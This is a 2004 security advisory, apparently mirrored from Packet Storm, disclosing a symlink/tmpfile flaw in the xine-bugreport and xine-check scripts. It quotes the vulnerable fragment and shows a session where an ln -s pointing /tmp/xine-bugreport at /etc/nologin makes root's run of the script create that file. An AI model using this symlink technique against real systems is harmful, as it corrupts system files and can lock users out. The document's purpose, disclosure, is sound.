Lucene search
K

xinebug.txt

🗓️ 20 Mar 2004 00:00:00Reported by Shaun Colley aka shaun2k2Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

Symlink vulnerability in xine-bugreport allows file corruption and potential privilege elevation.

Code
`~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*  
  
Product: xine-bugreport/xine-check scripts.  
http://xinehq.de/  
  
Versions: xine-bugreport && xine-check  
(they are the same script, but 2  
copies exist in a system with different  
names)  
Bug: Symlink bug / tmpfile bug.  
Impact: Attacker's can write to arbitrary files,  
corrupt sensitive system files, and in  
theory elevate privileges (unlikely).  
Risk: Low/Medium  
Date: March 19, 2004  
Author: Shaun Colley  
Email: shaunige yahoo co uk  
WWW: http://www.nettwerked.co.uk  
  
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*  
  
  
  
Introduction  
#############  
  
"xine is a free multimedia player. It plays back CDs,  
DVDs, and VCDs. It also decodes multimedia files like  
AVI, MOV, WMV, and MP3 from local disk drives, and  
displays multimedia streamed over the Internet. It  
interprets many of the most common multimedia formats  
available - and some of the most uncommon formats,  
too." - extracted from <http://www.xinehq.de>, xine  
project site.  
  
Due to the ongoing, and sometimes experimental  
addition of features added to xine, a script (*there  
is two copies of the script: /usr/bin/xine-bugreport  
and /usr/bin/xine-check - they are *exactly* the  
same*) is included in xine distributions to allow a  
user to possibly remedy a problem, or report a bug if  
their problem could not be solved. However, in the  
bug-reporting code, the bug report email is dumped to  
a file in the /tmp directory for a user to use later  
or send manually - this file is written in a insecure  
manner, presenting a symlink vulnerability.  
  
  
  
Details  
########  
  
In the section of the xine-bugreport/xine-check script  
which assembles a bug report email, a symlink  
vulnerability exists due to an insecure file write of  
the finished bug report email template. This may  
allow an attacker to write to/corrupt sensitive system  
files, and in theory elevate privileges, although  
unlikely.  
  
The bug occurs in the following code fragment:  
  
--- xine-bugreport / xine-check frag ---  
[...]  
  
bugreport=/tmp/xine-bugreport  
  
[...]  
  
add ""  
add "additional description:"  
add "----------------------"  
add ""  
add "PUT YOUR DESCRIPTION HERE"  
add "(please replace these two lines by your complete  
problem description)"  
add ""  
add ""  
add "system info, as found by xine-check:"  
add "-----------------------------------"  
cat "$logfile" >>$bugreport # no file check performed  
  
[...]  
--- EOF  
  
As can be seen, no file checks take place before the  
script (xine-check/xine-bugreport) 'cats' the bug  
report template into the file defined in the  
$bugreport variable, /tmp/xine-bugreport.   
  
The xine-check/xine-bugreport script has the following  
structure:  
  
- Check xine-related configuration  
- Suggest hints to fix any problems which might occur  
- Ask the user if the hints fixed the problem  
- If it did not, ask the user what type of problem  
they   
are having  
- If the user chooses the "something else" option  
(option 8), the bug report section of the script  
starts. - this is one place where the vulnerability  
exists.  
- Also, if other options were picked as the type of  
problem, choosing various things will allow a user to  
report the problem as a bug.   
Due to this insecure method of handling files, a  
symlink bug presents itself, allowing an attacker to  
write to/corrupt files with the permissions of the  
invoking user of the xine-bugreport/xine-check script.  
Exploitation is trivial. Details are presented  
below.  
  
  
  
Exploitation  
#############  
  
Below is an example exploitation scenario which I  
actually carried out on my system.  
  
--- attack ---  
[shaun@localhost shaun]$ ls -al /etc/nologin  
ls: /etc/nologin: No such file or directory  
[shaun@localhost shaun]$ ln -s /etc/nologin  
/tmp/xine-bugreport  
  
[...]  
  
[root@localhost bin]# xine-bugreport  
Please be patient, this script may take a while to  
run...  
logging to /tmp/xine-check.log...  
[OUCH!!] You're running me with root permissions?  
You should definitely run xine as normal  
user, not root. Running it as  
root will expose you to some severe security  
issues.  
This script should run as the same user that  
you would use to run  
xine. If you run me as root (as you currently  
are), I cannot check  
if your real-life user has sufficient  
permissions...  
Unless you want to recheck something with  
root permissions, you should  
abort me now (press Ctrl-C) and run me from  
your usual account.  
press <enter> to continue...  
  
  
  
[ good ] you're using Linux, doing specific tests  
  
  
[ good ] looks like you have a /proc filesystem  
mounted.  
  
  
[ good ] You seem to have a reasonable kernel version  
(2.4.19-16mdk)  
[ good ] intel compatible processor, checking MTRR  
support  
[ good ] you have MTRR support and there are some  
ranges set.  
[ good ] found the player at /usr/bin/xine  
[ good ] /usr/bin/xine is in your PATH  
[ hint ] No xine-config found. Assuming xine from RPMs  
The xine-config script can be used to  
deternime some file locations  
used by xine-lib, but you don't have such a  
script on your system.  
However, it looks like you installed xine  
from the RedHat packages.  
So I'll just guess that you are using the  
standard locations.  
If you want me to be sure about those file  
locations, you can install  
the 'xine-lib-devel' package (or  
'xine-devel', depend on what packages  
you're using, which contains xine-config.  
However, this package is  
not really needed to run xine...  
press <enter> to continue...  
[ good ] plugin directory /usr/lib/xine/plugins  
exists.  
[ good ] found input plugins  
[ good ] found demux plugins  
[ good ] found decoder plugins  
[ good ] found video_out plugins  
[ good ] found audio_out plugins  
[ good ] skin directory /usr/share/xine/skins exists.  
[ good ] found logo in /usr/share/xine/skins  
[ good ] I even found some skins.  
[ good ] /dev/cdrom points to  
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd  
[ hint ] /dev/dvd is /dev/dvd, not a DVD device  
/dev/dvd is the default device that xine uses  
for playing DVDs.  
You could make your life easier by creating a  
symlink named /dev/dvd  
pointing to your DVD device (something like  
/dev/scd0 or /dev/hdc).  
If your DVD-ROM device is /dev/hdb (slave  
ATAPI device on primary bus),  
rm /dev/dvd  
ln -s hdb /dev/dvd  
typed as root will give you the symlink.  
Alternatively, you can configure xine to use  
the real device directly,  
using the setup dialog within xine, but I  
can't check your DMA  
settings in that case...  
press <enter> to continue...  
[ good ] found xvinfo: X-Video Extension version 2.2  
[ hint ] Your X server doesn't support YUV overlays.  
That means xine will have to to color space  
transformation and scaling  
in software, which is quite CPU intensive.  
Maybe upgrading your  
X server will help here.  
If you have an ATI card, you'll find  
accelerated X servers on  
http://www.linuxvideo.org/gatos/  
press <enter> to continue...  
[ hint ] Your X server doesn't support packed YUV  
overlays.  
That means xine will have to to color space  
transformation and scaling  
in software, which is quite CPU intensive.  
Maybe upgrading your  
X server will help here.  
If you have an ATI card, you'll find  
accelerated X servers on  
http://www.linuxvideo.org/gatos/  
press <enter> to continue...  
[ hint ] Your X server doesn't have any XVideo  
support...  
XVideo is an X server extension introduced by  
XFree86 4.x. This  
extension provides access to hardware  
accelerated color space  
conversion and scaling, which gives a great  
performance boost.  
If you have a fast (>1GHz) machine, you may  
be able to watch all  
kinds of video, anyway. You will waste lots  
of CPU cycles, though...  
press <enter> to continue...  
  
  
Could you solve your xine problems using the previous  
hints? (y/n)?  
'pardon?? neither yes nor no? assuming no...  
  
What kind of trouble does xine cause for you?  
  
1) plays audio, but no video  
2) plays video, but no audio  
3) audio is interrupted and/or crackling  
4) audio and video are out of sync  
5) can't play DVDs  
6) xine hangs instead of playing anything  
7) xine doesn't start  
8) something else  
[root@localhost bin]# xine-bugreport  
Please be patient, this script may take a while to  
run...  
logging to /tmp/xine-check.log...  
[OUCH!!] You're running me with root permissions?  
You should definitely run xine as normal  
user, not root. Running it as  
root will expose you to some severe security  
issues.  
This script should run as the same user that  
you would use to run  
xine. If you run me as root (as you currently  
are), I cannot check  
if your real-life user has sufficient  
permissions...  
Unless you want to recheck something with  
root permissions, you should  
abort me now (press Ctrl-C) and run me from  
your usual account.  
press <enter> to continue...  
  
[ good ] you're using Linux, doing specific tests  
[ good ] looks like you have a /proc filesystem  
mounted.  
[ good ] You seem to have a reasonable kernel version  
(2.4.19-16mdk)  
[ good ] intel compatible processor, checking MTRR  
support  
[ good ] you have MTRR support and there are some  
ranges set.  
[ good ] found the player at /usr/bin/xine  
[ good ] /usr/bin/xine is in your PATH  
[ hint ] No xine-config found. Assuming xine from RPMs  
The xine-config script can be used to  
deternime some file locations  
used by xine-lib, but you don't have such a  
script on your system.  
However, it looks like you installed xine  
from the RedHat packages.  
So I'll just guess that you are using the  
standard locations.  
If you want me to be sure about those file  
locations, you can install  
the 'xine-lib-devel' package (or  
'xine-devel', depend on what packages  
you're using, which contains xine-config.  
However, this package is  
not really needed to run xine...  
press <enter> to continue...  
  
[ good ] plugin directory /usr/lib/xine/plugins  
exists.  
[ good ] found input plugins  
[ good ] found demux plugins  
[ good ] found decoder plugins  
[ good ] found video_out plugins  
[ good ] found audio_out plugins  
[ good ] skin directory /usr/share/xine/skins exists.  
[ good ] found logo in /usr/share/xine/skins  
[ good ] I even found some skins.  
[ good ] /dev/cdrom points to  
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd  
[ hint ] /dev/dvd is /dev/dvd, not a DVD device  
/dev/dvd is the default device that xine uses  
for playing DVDs.  
You could make your life easier by creating a  
symlink named /dev/dvd  
pointing to your DVD device (something like  
/dev/scd0 or /dev/hdc).  
If your DVD-ROM device is /dev/hdb (slave  
ATAPI device on primary bus),  
rm /dev/dvd  
ln -s hdb /dev/dvd  
typed as root will give you the symlink.  
Alternatively, you can configure xine to use  
the real device directly,  
using the setup dialog within xine, but I  
can't check your DMA  
settings in that case...  
press <enter> to continue...  
  
[ good ] found xvinfo: X-Video Extension version 2.2  
[ hint ] Your X server doesn't support YUV overlays.  
That means xine will have to to color space  
transformation and scaling  
in software, which is quite CPU intensive.  
Maybe upgrading your  
X server will help here.  
If you have an ATI card, you'll find  
accelerated X servers on  
http://www.linuxvideo.org/gatos/  
press <enter> to continue...  
  
[ hint ] Your X server doesn't support packed YUV  
overlays.  
That means xine will have to to color space  
transformation and scaling  
in software, which is quite CPU intensive.  
Maybe upgrading your  
X server will help here.  
If you have an ATI card, you'll find  
accelerated X servers on  
http://www.linuxvideo.org/gatos/  
press <enter> to continue...  
  
[ hint ] Your X server doesn't have any XVideo  
support...  
XVideo is an X server extension introduced by  
XFree86 4.x. This  
extension provides access to hardware  
accelerated color space  
conversion and scaling, which gives a great  
performance boost.  
If you have a fast (>1GHz) machine, you may  
be able to watch all  
kinds of video, anyway. You will waste lots  
of CPU cycles, though...  
press <enter> to continue...  
  
  
  
Could you solve your xine problems using the previous  
hints? (y/n)?  
n  
  
What kind of trouble does xine cause for you?  
  
1) plays audio, but no video  
2) plays video, but no audio  
3) audio is interrupted and/or crackling  
4) audio and video are out of sync  
5) can't play DVDs  
6) xine hangs instead of playing anything  
7) xine doesn't start  
8) something else  
please select (1..8): 8  
please describe your xine problem briefly in _one_  
line ( < 65 characters):  
hello world  
  
  
You should include a _complete_ copy of xine's output  
in your bug report.  
Note, however, that there is a 40K limit on messages  
sent to the mailing list,  
So you should strip down the parts that repeat over  
and over,  
if there are any.  
You can either copy&paste this output from the  
terminal where you ran xine,  
or you can collect xine's output in a file named  
/tmp/xine.out, using  
this command:  
xine >/tmp/xine.out 2>&1  
(assuming you have a Bourne compatible shell, like  
bash, for example)  
If you need to add any parameters, you can do so...  
This method is useful if you want to remove part of  
the output...  
Which method would you prefer?  
1) copy&paste  
2) logfile /tmp/xine.out  
please select (1..2): 2  
  
please press <return> when you have the log ready in  
/tmp/xine.out  
  
Hmmm, I could not read the /tmp/xine.out file.  
Skipping this step.  
You may add the output later, if this wasn't your  
intention...  
press <enter> to continue...  
  
  
  
Okay. That's all I could guide you through...  
I have assembled a skeleton for your bugreport in the  
file  
  
/tmp/xine-bugreport  
  
You're strongly encouraged to add a detailed  
description of your problem.  
Just look for 'additional description', and fill it  
in...  
  
When you're finished, you can use your favourite  
mailer to send it to  
<[email protected]>. Please use this subject  
line, or something similar:  
Subject: bug: hello world  
Alternatively, I could try to send the bug report for  
you, using  
/bin/mail -s "bug: hello world"  
Please make sure to add the additional description  
before saying "yes"!  
Do you want me to do this now? (y/n)?  
n  
Thanks for your bugreport! Have a nice day!  
  
[...]  
  
[shaun@localhost shaun]$ ls -al /etc/nologin  
-rw-r--r-- 1 root root 1756 Mar 20  
21:56 /etc/nologin  
[shaun@localhost shaun]$  
---  
  
  
  
Summary  
########  
  
The vulnerability can *ONLY* be exploited when the  
user enters the part of the xine-check/xine-bugreport  
script which allows them to send a bug report to Xine  
developers. This is the part of the script in which  
the insecure file handling is performed - thus  
manifesting the symlink bug. While it may be unlikely  
that these conditions occur, the results can be fairly  
severe, as demonstrated above.  
  
  
  
Credit  
#######  
  
This issue was discovered by shaun2k2 / Shaun Colley - <[email protected]>.  
  
  
  
  
  
___________________________________________________________  
Yahoo! Messenger - Communicate instantly..."Ping"   
your friends today! Download Messenger Now   
http://uk.messenger.yahoo.com/download/index.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation